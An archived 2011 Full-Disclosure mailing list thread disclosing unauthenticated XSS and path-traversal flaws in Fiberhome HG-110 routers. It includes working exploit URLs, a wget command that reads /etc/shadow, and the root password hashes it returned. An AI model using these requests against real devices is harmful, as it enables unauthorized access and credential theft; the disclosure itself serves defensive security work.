[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] Fiberhome HG-110 (adsl/router) vulnerabilities
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: Re: [Full-disclosure] Fiberhome HG-110 (adsl/router) vulnerabilities
- From: "Zerial." <fernando@xxxxxxxxxx>
- Date: Sun, 10 Apr 2011 05:41:31 -0300
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
You can include /etc/shadow:
$ wget -o /dev/null -O - "http://192.168.1.1:8000/cgi-bin
/webproc?getpage=../../../../../../../../../../../../etc/shadow&
var:menu=advanced&var:page=dns"
#root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
"httpd" process are running as root:
~ $ ps ax|grep httpd
509 root 4212 SW /usr/sbin/mini_httpd -d /usr/www -c
/cgi-bin/* -u roo
~ $
On 04/08/11 10:30, Zerial. wrote:
> I found two vulnerabilities on fiberhome hg-110 routers[1] and has not
> been reported nor fixed.
>
> XSS:
> -
> http://192.168.1.1:8000/cgi-bin/webproc?getpage=%3Cscript%3Ealert%28this%29%3C/script%3E&var:menu=advanced&var:page=dns
>
> Local File Include and Directory/Path Traversal:
>
> -
> http://192.168.1.1:8000/cgi-bin/webproc?getpage=../../../../../../../../../../../../etc/passwd&var:menu=advanced&var:page=dns
>
> URLs are accessible without authentication.
>
> Device info:
>
> - HardwareVersion : HG110_BH_R1A
>
> - SoftwareVersion : HG110_BH_V1.6
>
> - Firmware Version : 1.0.0
>
>
> This vulnerabilities can affect to other version and models of this vendor.
>
>
> [1] http://www.minuevohogar.cl/wp-content/uploads/2011/03/Imagen-8.png
- --
Zerial
Seguridad Informatica
GNU/Linux User #382319
Blog: http://blog.zerial.org
Jabber: zerial@xxxxxxxxxxxx
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iEYEARECAAYFAk2hbToACgkQIP17Kywx9JTzmgCdFhSbDXenCm/EoGxOzQzrSvuf
h4MAmweTe4P8CVmaewUri9B4H3ruqwjp
=cEzg
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/